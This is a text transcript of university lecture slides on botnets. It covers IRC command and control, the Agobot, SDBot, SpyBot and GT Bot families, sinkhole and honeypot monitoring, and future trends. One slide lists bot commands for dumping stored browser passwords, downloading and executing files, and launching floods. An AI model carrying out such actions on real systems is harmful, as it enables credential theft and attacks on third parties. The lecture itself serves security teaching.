cis3360: security in computing chapter 4.3 : botnets cliff zou spring 2012
TRANSCRIPT
![Page 1: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/1.jpg)
CIS3360: Security in Computing
Chapter 4.3 : BotnetsCliff Zou
Spring 2012
![Page 2: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/2.jpg)
2
Acknowledgement
This lecture uses some contents from the lecture notes from:
Dr. Dawn Song: CS161: computer security Richard Wang – SophosLabs: The Development of
Botnets Randy Marchany - VA Tech IT Security Lab: Botnets
![Page 3: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/3.jpg)
3
Botnets
Collection of compromised hosts Spread like worms and viruses Once installed, respond to remote commands
A network of ‘bots’ robot :
an automatic machine that can be programmed to perform specific tasks.
Also known as ‘zombies’
![Page 4: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/4.jpg)
4
Platform for many attacks Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks
Serious problem Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet
![Page 5: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/5.jpg)
5
What are botnets used for?
![Page 6: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/6.jpg)
6
IRC (Internet Relay Chat) based Control
![Page 7: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/7.jpg)
7
IRC (Internet Relay Chat) based Control
![Page 8: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/8.jpg)
8
Why IRC?
IRC servers are: freely available easy to manage easy to subvert
Attackers have experience with IRC IRC bots usually have a way to
remotely upgrade victims with new payloads to stay ahead of security efforts
![Page 9: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/9.jpg)
9
How bad is the problem?
Symantec identified a 400K node botnet
Netadmin in the Netherlands discovered 1-2M unique IPs associated with Phatbot infections. Phatbot harvests MyDoom and Bagel
infected machines. Researchers in Gtech monitored
thousands of botnets
![Page 10: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/10.jpg)
10
Spreading Problem
Spreading mechanism is a leading cause of background noise Port 445, 135, 139, 137 accounted for
80% of traffic captured by German Honeynet Project
Other ports 2745 – bagle backdoor 3127 – MyDoom backdoor 3410 – Optix trojan backdoor 5000 – upnp vulnerability
![Page 11: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/11.jpg)
Most commonly used Bot families
Agobot
SDBot
SpyBot
GT Bot
![Page 12: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/12.jpg)
Agobot
Most sophisticated 20,000 lines C/C++ code IRC based command/control Large collection of target exploits Capable of many DoS attack types Shell encoding/polymorphic obfuscation Traffic sniffers/key logging Defend/fortify compromised system Ability to frustrate dissassembly
![Page 13: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/13.jpg)
SDBot Simpler than Agobot, 2,000 lines C code Non-malicious at base Utilize IRC-based command/control Easily extended for malicious purposes
Scanning DoS Attacks Sniffers Information harvesting Encryption
![Page 14: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/14.jpg)
SpyBot <3,000 lines C code Possibly evolved from SDBot
Similar command/control engine No attempts to hide malicious purposes
![Page 15: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/15.jpg)
GT Bot Functions based on mIRC scripting
capabilities HideWindow program hides bot on
local system Basic rootkit function
Port scanning, DoS attacks, exploits for RPC and NetBIOS
![Page 16: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/16.jpg)
Variance in codebase size, structure, complexity, implementation
Convergence in set of functions Possibility for defense systems effective across
bot families Bot families extensible Agobot likely to become dominant
![Page 17: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/17.jpg)
All of the above use IRC for command/control
Disrupt IRC, disable bots Sniff IRC traffic for commands Shutdown channels used for Botnets
IRC operators play central role in stopping botnet traffic
But a botnet could use its own IRC server Automated traffic identification required Future botnets may move away from IRC
Move to P2P communication Traffic fingerprinting still useful for
identification
Control
![Page 18: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/18.jpg)
Host control
Fortify system against other malicious attacks
Disable anti-virus software Harvest sensitive information
PayPal, software keys, etc. Economic incentives for botnets
Stresses need to patch/protect systems prior to attack
Stronger protection boundaries required across applications in OSes
![Page 19: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/19.jpg)
19
Example Botnet Commands
Connection CLIENT: PASS <password> HOST : (if error, disconnect) CLIENT: NICK <nick> HOST : NICKERROR | CONNECTED
Pass hierarchy info BOTINFO <nick> <connected_to>
<priority> BOTQUIT <nick>
![Page 20: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/20.jpg)
20
Example Botnet Commands
IRC Commands CHANJOIN <tag> <channel> CHANPART <tag> <channel> CHANOP <tag> <channel> CHANKICK <tag> <channel> CHANBANNED <tag> <channel> CHANPRIORITY <ircnet> <channel>
<LOW/NORMAL/HIGH>
![Page 21: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/21.jpg)
21
Example Botnet Commands
pstore Display all usernames/passwords stored
in browsers of infected systems bot.execute
Run executable on remote system bot.open
Reads file on remote computer bot.command
Runs command with system()
![Page 22: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/22.jpg)
22
Example Botnet Commands
http.execute Download and execute file through http ftp.execute
ddos.udpflood ddos.synflod ddos.phaticmp redirect.http redirect.socks
![Page 23: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/23.jpg)
23
Current Botnet Control Architecture
bot bot
C&C
botmaster
bot
C&C
•More than one C&C server•Spread all around the world
![Page 24: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/24.jpg)
24
Botnet Monitor: Gatech KarstNet
A lot bots use Dyn-DNS name to find C&C
bot
bot
C&C
attacker
C&C
KarstNet sinkhole
cc1.com KarstNet informs DNS
provider of cc1.com Detect cc1.com by its abnormal
DNS queries
DNS provider maps cc1.com to Gatech sinkhole (DNS hijack)
bot
All/most bots attempt to connect the sinkhole
![Page 25: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/25.jpg)
Botnet Monitor: Honeypot Spy Security researchers set up honeypots
Honeypots: deliberately set up vulnerable machines When compromised, put close monitoring of malware’s
behaviors Tutorial: http://en.wikipedia.org/wiki/Honeypot_%28computing
%29 When compromised honeypot joins a botnet
Passive monitoring: log all network traffic Active monitoring: actively contact other bots to obtain more
information (neighborhood list, additional c&c, etc.) Representative research paper:
A multifaceted approach to understanding the botnet phenomenon, Abu Rajab, Moheeb and Zarfoss, Jay and Monrose, Fabian and Terzis, Andreas, 6th ACM SIGCOMM conference on Internet measurement (IMC), 2006.
25
![Page 26: CIS3360: Security in Computing Chapter 4.3 : Botnets Cliff Zou Spring 2012](https://reader036.vdocuments.mx/reader036/viewer/2022062518/56649f445503460f94c64b6c/html5/thumbnails/26.jpg)
26
The Future Generation of Botnets
Peer-to-Peer C&C
Polymorphism
Anti-honeypot
Rootkit techniques